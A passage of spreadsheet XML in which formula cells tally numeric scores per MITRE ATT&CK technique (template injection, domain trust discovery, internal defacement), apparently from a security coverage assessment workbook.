        <f>IF('(A) Ataques'!AK58&lt;&gt;"NO",'(A) Ataques'!E58,"")</f>
        <v>43</v>
      </c>
      <c r="C58" s="6" t="str">
        <f>IF('(A) Ataques'!AK58&lt;&gt;"NO",IF('(A) Ataques'!M58="","",'(A) Ataques'!M58),"")</f>
        <v>T1221-Template_Injection</v>
      </c>
      <c r="D58" s="4" t="str">
        <f>IF('(A) Ataques'!AK58&lt;&gt;"NO",'(A) Ataques'!F58,"")</f>
        <v>T1221</v>
      </c>
      <c r="E58" s="286">
        <f>IF('(A) Ataques'!AK58&lt;&gt;"NO",'(A) Ataques'!AQ58,"")</f>
        <v>16</v>
      </c>
      <c r="F58" s="288">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!BB58,"")</f>
        <v>1</v>
      </c>
      <c r="G58" s="392">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!BD58,"")</f>
        <v>1</v>
      </c>
      <c r="H58" s="4">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!BF58,"")</f>
        <v>1</v>
      </c>
      <c r="I58" s="20">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!BG58,"")</f>
        <v>1</v>
      </c>
      <c r="J58" s="530">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",IF($F58=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K58" s="322">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$BH58,"")</f>
        <v>5</v>
      </c>
      <c r="L58" s="322">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$BJ58,"")</f>
        <v>5</v>
      </c>
      <c r="M58" s="4">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$BL58,"")</f>
        <v>5</v>
      </c>
      <c r="N58" s="20">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$BM58,"")</f>
        <v>4</v>
      </c>
      <c r="O58" s="532">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",IF($K58=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P58" s="292">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$BN58,"")</f>
        <v>6</v>
      </c>
      <c r="Q58" s="322">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$BP58,"")</f>
        <v>6</v>
      </c>
      <c r="R58" s="4">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$BR58,"")</f>
        <v>6</v>
      </c>
      <c r="S58" s="20">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$BS58,"")</f>
        <v>4</v>
      </c>
      <c r="T58" s="530">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",IF($P58=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U58" s="322">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$BT58,"")</f>
        <v>16</v>
      </c>
      <c r="V58" s="322">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$BV58,"")</f>
        <v>11</v>
      </c>
      <c r="W58" s="4">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$BX58,"")</f>
        <v>6</v>
      </c>
      <c r="X58" s="20">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$BY58,"")</f>
        <v>9</v>
      </c>
      <c r="Y58" s="532">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",IF($U58=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z58" s="288">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!BZ58,"")</f>
        <v>21</v>
      </c>
      <c r="AA58" s="392">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!CB58,"")</f>
        <v>15</v>
      </c>
      <c r="AB58" s="4">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!CD58,"")</f>
        <v>13</v>
      </c>
      <c r="AC58" s="20">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!CE58,"")</f>
        <v>7</v>
      </c>
      <c r="AD58" s="331">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",IF(Z58=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE58" s="322">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$CF58,"")</f>
        <v>37</v>
      </c>
      <c r="AF58" s="322">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$CH58,"")</f>
        <v>26</v>
      </c>
      <c r="AG58" s="4">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$CJ58,"")</f>
        <v>19</v>
      </c>
      <c r="AH58" s="20">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$CK58,"")</f>
        <v>10</v>
      </c>
      <c r="AI58" s="287">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",IF($AE58=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ58" s="292">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$CL58,"")</f>
        <v>0</v>
      </c>
      <c r="AK58" s="322">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$CN58,"")</f>
        <v>0</v>
      </c>
      <c r="AL58" s="4">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$CP58,"")</f>
        <v>0</v>
      </c>
      <c r="AM58" s="20">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$CQ58,"")</f>
        <v>0</v>
      </c>
      <c r="AN58" s="331">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",IF($AJ58=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO58" s="322">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$CR58,"")</f>
        <v>8</v>
      </c>
      <c r="AP58" s="322">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$CT58,"")</f>
        <v>3</v>
      </c>
      <c r="AQ58" s="4">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$CV58,"")</f>
        <v>3</v>
      </c>
      <c r="AR58" s="20">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!$CW58,"")</f>
        <v>3</v>
      </c>
      <c r="AS58" s="287">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",IF($AO58=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT58" s="288">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!CX58,"")</f>
        <v>14</v>
      </c>
      <c r="AU58" s="392">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!CZ58,"")</f>
        <v>9</v>
      </c>
      <c r="AV58" s="4">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!DB58,"")</f>
        <v>9</v>
      </c>
      <c r="AW58" s="20">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",'(A) Ataques'!DC58,"")</f>
        <v>7</v>
      </c>
      <c r="AX58" s="331">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",IF($AT58=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY58" s="469">
        <f>'(A) Ataques'!LU58+'(A) Ataques'!MA58+'(A) Ataques'!MG58+'(A) Ataques'!MM58+'(A) Ataques'!MS58</f>
        <v>8</v>
      </c>
      <c r="AZ58" s="510">
        <f>'(A) Ataques'!LW58+'(A) Ataques'!MC58+'(A) Ataques'!MI58+'(A) Ataques'!MO58+'(A) Ataques'!MU58</f>
        <v>7</v>
      </c>
      <c r="BA58" s="471">
        <f>'(A) Ataques'!LY58+'(A) Ataques'!ME58+'(A) Ataques'!MK58+'(A) Ataques'!MQ58+'(A) Ataques'!MW58</f>
        <v>2</v>
      </c>
      <c r="BB58" s="471">
        <f>'(A) Ataques'!LQ58</f>
        <v>7</v>
      </c>
      <c r="BC58" s="331">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",IF($AY58=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD58" s="469">
        <f>IF('(A) Ataques'!$AP58&lt;&gt;"NO",'(A) Ataques'!LL58,"")</f>
        <v>20</v>
      </c>
      <c r="BE58" s="510">
        <f>IF('(A) Ataques'!$AP58&lt;&gt;"NO",'(A) Ataques'!LM58,"")</f>
        <v>17</v>
      </c>
      <c r="BF58" s="471">
        <f>IF('(A) Ataques'!$AP58&lt;&gt;"NO",'(A) Ataques'!LN58,"")</f>
        <v>2</v>
      </c>
      <c r="BG58" s="471">
        <f>IF('(A) Ataques'!$AP58&lt;&gt;"NO",'(A) Ataques'!LO58,"")</f>
        <v>6</v>
      </c>
      <c r="BH58" s="471">
        <f>IF('(A) Ataques'!$AP58&lt;&gt;"NO",'(A) Ataques'!LS58,"")</f>
        <v>11</v>
      </c>
      <c r="BI58" s="331">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",IF($BD58=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ58" s="469">
        <f>'(A) Ataques'!OL58+'(A) Ataques'!OR58+'(A) Ataques'!OX58+'(A) Ataques'!PD58+'(A) Ataques'!PJ58</f>
        <v>6</v>
      </c>
      <c r="BK58" s="510">
        <f>'(A) Ataques'!ON58+'(A) Ataques'!OT58+'(A) Ataques'!OZ58+'(A) Ataques'!PF58+'(A) Ataques'!PL58</f>
        <v>6</v>
      </c>
      <c r="BL58" s="471">
        <f>'(A) Ataques'!OP58+'(A) Ataques'!OV58+'(A) Ataques'!PB58+'(A) Ataques'!PH58+'(A) Ataques'!PN58</f>
        <v>1</v>
      </c>
      <c r="BM58" s="495">
        <f>'(A) Ataques'!OH58</f>
        <v>6</v>
      </c>
      <c r="BN58" s="331">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",IF($BJ58=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO58" s="469">
        <f>IF('(A) Ataques'!$AP58&lt;&gt;"NO",'(A) Ataques'!OC58,"")</f>
        <v>6</v>
      </c>
      <c r="BP58" s="510">
        <f>IF('(A) Ataques'!$AP58&lt;&gt;"NO",'(A) Ataques'!OD58,"")</f>
        <v>6</v>
      </c>
      <c r="BQ58" s="471">
        <f>IF('(A) Ataques'!$AP58&lt;&gt;"NO",'(A) Ataques'!OE58,"")</f>
        <v>1</v>
      </c>
      <c r="BR58" s="471">
        <f>IF('(A) Ataques'!$AP58&lt;&gt;"NO",'(A) Ataques'!OF58,"")</f>
        <v>1</v>
      </c>
      <c r="BS58" s="471">
        <f>IF('(A) Ataques'!$AP58&lt;&gt;"NO",'(A) Ataques'!OJ58,"")</f>
        <v>6</v>
      </c>
      <c r="BT58" s="331">
        <f>IF('(A) Ataques'!$AK58&lt;&gt;"NO",IF($BO58=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="59" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A59" s="79">
        <f t="shared" si="0"/>
        <v>57</v>
      </c>
      <c r="B59" s="4">
        <f>IF('(A) Ataques'!AK59&lt;&gt;"NO",'(A) Ataques'!E59,"")</f>
        <v>44</v>
      </c>
      <c r="C59" s="6" t="str">
        <f>IF('(A) Ataques'!AK59&lt;&gt;"NO",IF('(A) Ataques'!M59="","",'(A) Ataques'!M59),"")</f>
        <v>T1482-Domain_trust_discovery</v>
      </c>
      <c r="D59" s="4" t="str">
        <f>IF('(A) Ataques'!AK59&lt;&gt;"NO",'(A) Ataques'!F59,"")</f>
        <v>T1482</v>
      </c>
      <c r="E59" s="286">
        <f>IF('(A) Ataques'!AK59&lt;&gt;"NO",'(A) Ataques'!AQ59,"")</f>
        <v>4</v>
      </c>
      <c r="F59" s="288">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!BB59,"")</f>
        <v>2</v>
      </c>
      <c r="G59" s="392">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!BD59,"")</f>
        <v>2</v>
      </c>
      <c r="H59" s="4">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!BF59,"")</f>
        <v>2</v>
      </c>
      <c r="I59" s="20">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!BG59,"")</f>
        <v>1</v>
      </c>
      <c r="J59" s="530">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",IF($F59=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K59" s="322">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$BH59,"")</f>
        <v>0</v>
      </c>
      <c r="L59" s="322">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$BJ59,"")</f>
        <v>0</v>
      </c>
      <c r="M59" s="4">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$BL59,"")</f>
        <v>0</v>
      </c>
      <c r="N59" s="20">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$BM59,"")</f>
        <v>0</v>
      </c>
      <c r="O59" s="532">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",IF($K59=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P59" s="292">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$BN59,"")</f>
        <v>2</v>
      </c>
      <c r="Q59" s="322">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$BP59,"")</f>
        <v>2</v>
      </c>
      <c r="R59" s="4">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$BR59,"")</f>
        <v>2</v>
      </c>
      <c r="S59" s="20">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$BS59,"")</f>
        <v>1</v>
      </c>
      <c r="T59" s="530">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",IF($P59=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U59" s="322">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$BT59,"")</f>
        <v>5</v>
      </c>
      <c r="V59" s="322">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$BV59,"")</f>
        <v>4</v>
      </c>
      <c r="W59" s="4">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$BX59,"")</f>
        <v>3</v>
      </c>
      <c r="X59" s="20">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$BY59,"")</f>
        <v>3</v>
      </c>
      <c r="Y59" s="532">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",IF($U59=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z59" s="288">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!BZ59,"")</f>
        <v>4</v>
      </c>
      <c r="AA59" s="392">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!CB59,"")</f>
        <v>2</v>
      </c>
      <c r="AB59" s="4">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!CD59,"")</f>
        <v>2</v>
      </c>
      <c r="AC59" s="20">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!CE59,"")</f>
        <v>1</v>
      </c>
      <c r="AD59" s="331">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",IF(Z59=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE59" s="322">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$CF59,"")</f>
        <v>9</v>
      </c>
      <c r="AF59" s="322">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$CH59,"")</f>
        <v>6</v>
      </c>
      <c r="AG59" s="4">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$CJ59,"")</f>
        <v>5</v>
      </c>
      <c r="AH59" s="20">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$CK59,"")</f>
        <v>3</v>
      </c>
      <c r="AI59" s="287">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",IF($AE59=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ59" s="292">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$CL59,"")</f>
        <v>0</v>
      </c>
      <c r="AK59" s="322">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$CN59,"")</f>
        <v>0</v>
      </c>
      <c r="AL59" s="4">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$CP59,"")</f>
        <v>0</v>
      </c>
      <c r="AM59" s="20">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$CQ59,"")</f>
        <v>0</v>
      </c>
      <c r="AN59" s="331">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",IF($AJ59=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO59" s="322">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$CR59,"")</f>
        <v>0</v>
      </c>
      <c r="AP59" s="322">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$CT59,"")</f>
        <v>0</v>
      </c>
      <c r="AQ59" s="4">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$CV59,"")</f>
        <v>0</v>
      </c>
      <c r="AR59" s="20">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!$CW59,"")</f>
        <v>0</v>
      </c>
      <c r="AS59" s="287">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",IF($AO59=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT59" s="288">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!CX59,"")</f>
        <v>2</v>
      </c>
      <c r="AU59" s="392">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!CZ59,"")</f>
        <v>2</v>
      </c>
      <c r="AV59" s="4">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!DB59,"")</f>
        <v>2</v>
      </c>
      <c r="AW59" s="20">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",'(A) Ataques'!DC59,"")</f>
        <v>1</v>
      </c>
      <c r="AX59" s="331">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",IF($AT59=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY59" s="469">
        <f>'(A) Ataques'!LU59+'(A) Ataques'!MA59+'(A) Ataques'!MG59+'(A) Ataques'!MM59+'(A) Ataques'!MS59</f>
        <v>5</v>
      </c>
      <c r="AZ59" s="510">
        <f>'(A) Ataques'!LW59+'(A) Ataques'!MC59+'(A) Ataques'!MI59+'(A) Ataques'!MO59+'(A) Ataques'!MU59</f>
        <v>3</v>
      </c>
      <c r="BA59" s="471">
        <f>'(A) Ataques'!LY59+'(A) Ataques'!ME59+'(A) Ataques'!MK59+'(A) Ataques'!MQ59+'(A) Ataques'!MW59</f>
        <v>1</v>
      </c>
      <c r="BB59" s="471">
        <f>'(A) Ataques'!LQ59</f>
        <v>3</v>
      </c>
      <c r="BC59" s="331">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",IF($AY59=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD59" s="469">
        <f>IF('(A) Ataques'!$AP59&lt;&gt;"NO",'(A) Ataques'!LL59,"")</f>
        <v>7</v>
      </c>
      <c r="BE59" s="510">
        <f>IF('(A) Ataques'!$AP59&lt;&gt;"NO",'(A) Ataques'!LM59,"")</f>
        <v>5</v>
      </c>
      <c r="BF59" s="471">
        <f>IF('(A) Ataques'!$AP59&lt;&gt;"NO",'(A) Ataques'!LN59,"")</f>
        <v>1</v>
      </c>
      <c r="BG59" s="471">
        <f>IF('(A) Ataques'!$AP59&lt;&gt;"NO",'(A) Ataques'!LO59,"")</f>
        <v>2</v>
      </c>
      <c r="BH59" s="471">
        <f>IF('(A) Ataques'!$AP59&lt;&gt;"NO",'(A) Ataques'!LS59,"")</f>
        <v>4</v>
      </c>
      <c r="BI59" s="331">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",IF($BD59=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ59" s="469">
        <f>'(A) Ataques'!OL59+'(A) Ataques'!OR59+'(A) Ataques'!OX59+'(A) Ataques'!PD59+'(A) Ataques'!PJ59</f>
        <v>1</v>
      </c>
      <c r="BK59" s="510">
        <f>'(A) Ataques'!ON59+'(A) Ataques'!OT59+'(A) Ataques'!OZ59+'(A) Ataques'!PF59+'(A) Ataques'!PL59</f>
        <v>1</v>
      </c>
      <c r="BL59" s="471">
        <f>'(A) Ataques'!OP59+'(A) Ataques'!OV59+'(A) Ataques'!PB59+'(A) Ataques'!PH59+'(A) Ataques'!PN59</f>
        <v>1</v>
      </c>
      <c r="BM59" s="495">
        <f>'(A) Ataques'!OH59</f>
        <v>1</v>
      </c>
      <c r="BN59" s="331">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",IF($BJ59=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO59" s="469">
        <f>IF('(A) Ataques'!$AP59&lt;&gt;"NO",'(A) Ataques'!OC59,"")</f>
        <v>1</v>
      </c>
      <c r="BP59" s="510">
        <f>IF('(A) Ataques'!$AP59&lt;&gt;"NO",'(A) Ataques'!OD59,"")</f>
        <v>1</v>
      </c>
      <c r="BQ59" s="471">
        <f>IF('(A) Ataques'!$AP59&lt;&gt;"NO",'(A) Ataques'!OE59,"")</f>
        <v>1</v>
      </c>
      <c r="BR59" s="471">
        <f>IF('(A) Ataques'!$AP59&lt;&gt;"NO",'(A) Ataques'!OF59,"")</f>
        <v>1</v>
      </c>
      <c r="BS59" s="471">
        <f>IF('(A) Ataques'!$AP59&lt;&gt;"NO",'(A) Ataques'!OJ59,"")</f>
        <v>1</v>
      </c>
      <c r="BT59" s="331">
        <f>IF('(A) Ataques'!$AK59&lt;&gt;"NO",IF($BO59=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="60" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A60" s="79">
        <f t="shared" si="0"/>
        <v>58</v>
      </c>
      <c r="B60" s="4">
        <f>IF('(A) Ataques'!AK60&lt;&gt;"NO",'(A) Ataques'!E60,"")</f>
        <v>45</v>
      </c>
      <c r="C60" s="6" t="str">
        <f>IF('(A) Ataques'!AK60&lt;&gt;"NO",IF('(A) Ataques'!M60="","",'(A) Ataques'!M60),"")</f>
        <v>T1491.001-Internal_Defacement</v>
      </c>
      <c r="D60" s="4" t="str">
        <f>IF('(A) Ataques'!AK60&lt;&gt;"NO",'(A) Ataques'!F60,"")</f>
        <v>T1491</v>
      </c>
      <c r="E60" s="286">
        <f>IF('(A) Ataques'!AK60&lt;&gt;"NO",'(A) Ataques'!AQ60,"")</f>
        <v>12</v>
      </c>
      <c r="F60" s="288">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!BB60,"")</f>
        <v>5</v>
      </c>
      <c r="G60" s="392">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!BD60,"")</f>
        <v>1</v>
      </c>
      <c r="H60" s="4">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!BF60,"")</f>
        <v>1</v>
      </c>
      <c r="I60" s="20">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!BG60,"")</f>
        <v>1</v>
      </c>
      <c r="J60" s="530">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",IF($F60=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K60" s="322">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$BH60,"")</f>
        <v>2</v>
      </c>
      <c r="L60" s="322">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$BJ60,"")</f>
        <v>2</v>
      </c>
      <c r="M60" s="4">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$BL60,"")</f>
        <v>2</v>
      </c>
      <c r="N60" s="20">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$BM60,"")</f>
        <v>1</v>
      </c>
      <c r="O60" s="532">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",IF($K60=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P60" s="292">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$BN60,"")</f>
        <v>7</v>
      </c>
      <c r="Q60" s="322">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$BP60,"")</f>
        <v>3</v>
      </c>
      <c r="R60" s="4">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$BR60,"")</f>
        <v>3</v>
      </c>
      <c r="S60" s="20">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$BS60,"")</f>
        <v>1</v>
      </c>
      <c r="T60" s="530">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",IF($P60=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U60" s="322">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$BT60,"")</f>
        <v>18</v>
      </c>
      <c r="V60" s="322">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$BV60,"")</f>
        <v>5</v>
      </c>
      <c r="W60" s="4">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$BX60,"")</f>
        <v>3</v>
      </c>
      <c r="X60" s="20">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$BY60,"")</f>
        <v>4</v>
      </c>
      <c r="Y60" s="532">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",IF($U60=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z60" s="288">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!BZ60,"")</f>
        <v>7</v>
      </c>
      <c r="AA60" s="392">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!CB60,"")</f>
        <v>5</v>
      </c>
      <c r="AB60" s="4">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!CD60,"")</f>
        <v>5</v>
      </c>
      <c r="AC60" s="20">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!CE60,"")</f>
        <v>1</v>
      </c>
      <c r="AD60" s="331">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",IF(Z60=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE60" s="322">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$CF60,"")</f>
        <v>25</v>
      </c>
      <c r="AF60" s="322">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$CH60,"")</f>
        <v>10</v>
      </c>
      <c r="AG60" s="4">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$CJ60,"")</f>
        <v>8</v>
      </c>
      <c r="AH60" s="20">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$CK60,"")</f>
        <v>4</v>
      </c>
      <c r="AI60" s="287">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",IF($AE60=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ60" s="292">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$CL60,"")</f>
        <v>0</v>
      </c>
      <c r="AK60" s="322">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$CN60,"")</f>
        <v>0</v>
      </c>
      <c r="AL60" s="4">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$CP60,"")</f>
        <v>0</v>
      </c>
      <c r="AM60" s="20">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$CQ60,"")</f>
        <v>0</v>
      </c>
      <c r="AN60" s="331">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",IF($AJ60=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO60" s="322">
        <f>IF('(A) Ataques'!$AK60&lt;&gt;"NO",'(A) Ataques'!$CR60,"")</f>
        <v>12</v>
